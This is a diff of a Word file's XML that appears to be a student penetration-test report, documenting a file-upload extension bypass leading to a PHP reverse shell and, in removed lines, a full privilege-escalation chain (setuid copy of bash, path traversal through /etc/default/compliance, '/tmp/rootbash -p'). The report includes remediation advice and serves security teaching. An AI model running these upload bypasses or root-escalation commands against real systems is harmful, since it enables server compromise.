+            <w:tcW w:w="6475" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:hyperlink r:id="rId25" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://www.juniper.net/us/en/threatlabs/ips-signatures/detail.SHELLCODE:PHP:REVERSE-SHELL.html</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
         <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Description</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">After exposing some </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>directories</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we found upload function so we tested it so it was blacklisting some file extension after trying we could upload a reverse </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> shell and get connection back on our machine </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+      <w:r>
+        <w:t>IMPACT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>An attacker can exploit this vulnerability to:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="27"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Full server compromise </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="27"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Data manipulation so you can lose your integrity </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="27"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Access to all sensitive files </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>RECOMMENDATIONS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Strict file </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>types</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> validation </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>whitebox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> filters on file upload function </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Only allow safe extensions (e.g., images) and verify MIME type + magic bytes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Steps to Reproduce</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">intercept the upload request </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">and send it to the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>intruder :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
           <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D72471E" wp14:editId="1B8A2B82">
-            <wp:extent cx="3848637" cy="609685"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1107265629" name="Picture 3" descr="A black background with white text&#10;&#10;AI-generated content may be incorrect."/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6192EC8F" wp14:editId="05244271">
+            <wp:extent cx="5238750" cy="2946797"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+            <wp:docPr id="375218890" name="Picture 5" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2673,11 +5200,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1107265629" name="Picture 3" descr="A black background with white text&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPr id="375218890" name="Picture 5" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13">
+                    <a:blip r:embed="rId26" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2691,7 +5218,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3848637" cy="609685"/>
+                      <a:ext cx="5238750" cy="2946797"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2706,38 +5233,39 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t xml:space="preserve">4- i tried to check if /compliance file exists and is permisstions by this command 'ls -l /etc/default/compliance /tmp/compliance.bak /tmp/root_listing /tmp/flag* 2&gt;/dev/null || true'  and it returned it can has all permisiions </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">specify the sniper attack from the intruder and specify the position as the file extension </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
           <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CF5EEB5" wp14:editId="5E2F8132">
-            <wp:extent cx="5943600" cy="275590"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4C5B39" wp14:editId="255D3E1A">
+            <wp:extent cx="5486400" cy="3086100"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="322887359" name="Picture 4"/>
+            <wp:docPr id="878135428" name="Picture 6" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2745,11 +5273,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="322887359" name="Picture 322887359"/>
+                    <pic:cNvPr id="878135428" name="Picture 6" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14">
+                    <a:blip r:embed="rId27" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2763,7 +5291,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="275590"/>
+                      <a:ext cx="5492212" cy="3089369"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2778,252 +5306,241 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>5- so i decided to take copy of it 'cat /tmp/compliance.bak &gt; /etc/default/compliance &amp;&amp; echo "restored"'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t xml:space="preserve">6- it returned error so i decided to run combination of commands to copy the root bash it seslf </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>mkdir -p /tmp/evil &amp;&amp; cat &gt;/tmp/evil/module.sh &lt;&lt;'EOF'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>check_exfil(){ cp /bin/bash /tmp/rootbash 2&gt;/dev/null || true; chmod 4755 /tmp/rootbash 2&gt;/dev/null || true; }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>EOF</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>chmod 644 /tmp/evil/module.sh &amp;&amp; echo 'COMPLIANCE_MODE=../../tmp/evil' &gt; /etc/default/compliance &amp;&amp; sleep 65 &amp;&amp; /tmp/rootbash -p</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t xml:space="preserve">what these commands do : </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- creates /tmp/evil and writes file /tmmp/evil/module.sh contains check_exfil function that attemps to copy /bin/bash to /tmp/rootbash and returns no error </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- then by chmod 4755 we make it can be run by any user by makes it setuid root executable </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>- Overwrites /etc/default/compliance with COMPLIANCE_MODE=../../tmp/evil. Many services/source scripts read that file</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-  then we make the sleep function to allow some processes to execute the module </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>- then we run the copies bash with -p flag /tmp/rootbash -p</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>- finally we got root shell</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>you</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can use the list we provided or</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">paste those in the payload </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>php3,php4,php5,phar</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>,phtml</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
           <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2FA3B0C1" wp14:editId="44362796">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:posOffset>1476375</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>184785</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="3857625" cy="323850"/>
+                <wp:effectExtent l="0" t="0" r="28575" b="19050"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="1682610882" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="3857625" cy="323850"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:hyperlink r:id="rId28" w:history="1">
+                              <w:r>
+                                <w:rPr>
+                                  <w:rStyle w:val="Hyperlink"/>
+                                </w:rPr>
+                                <w:t>https://github.com/ahmeedkhattabj/omerta-final-project/blob/main/comp-webserver/ext.txt</w:t>
+                              </w:r>
+                            </w:hyperlink>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="2FA3B0C1" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:116.25pt;margin-top:14.55pt;width:303.75pt;height:25.5pt;z-index:251667456;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:hyperlink r:id="rId29" w:history="1">
+                        <w:r>
+                          <w:rPr>
+                            <w:rStyle w:val="Hyperlink"/>
+                          </w:rPr>
+                          <w:t>https://github.com/ahmeedkhattabj/omerta-final-project/blob/main/comp-webserver/ext.txt</w:t>
+                        </w:r>
+                      </w:hyperlink>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">list we </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>used :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">you will find the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>phtml</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> extension accepted now you can upload the file using it </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C512020" wp14:editId="20EE3222">
-            <wp:extent cx="5943600" cy="738505"/>
-            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
-            <wp:docPr id="2118365965" name="Picture 6" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E2CA4D5" wp14:editId="5E029D66">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="2081024884" name="Picture 7" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -3031,11 +5548,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="2118365965" name="Picture 6" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPr id="2081024884" name="Picture 7" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15">
+                    <a:blip r:embed="rId30" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
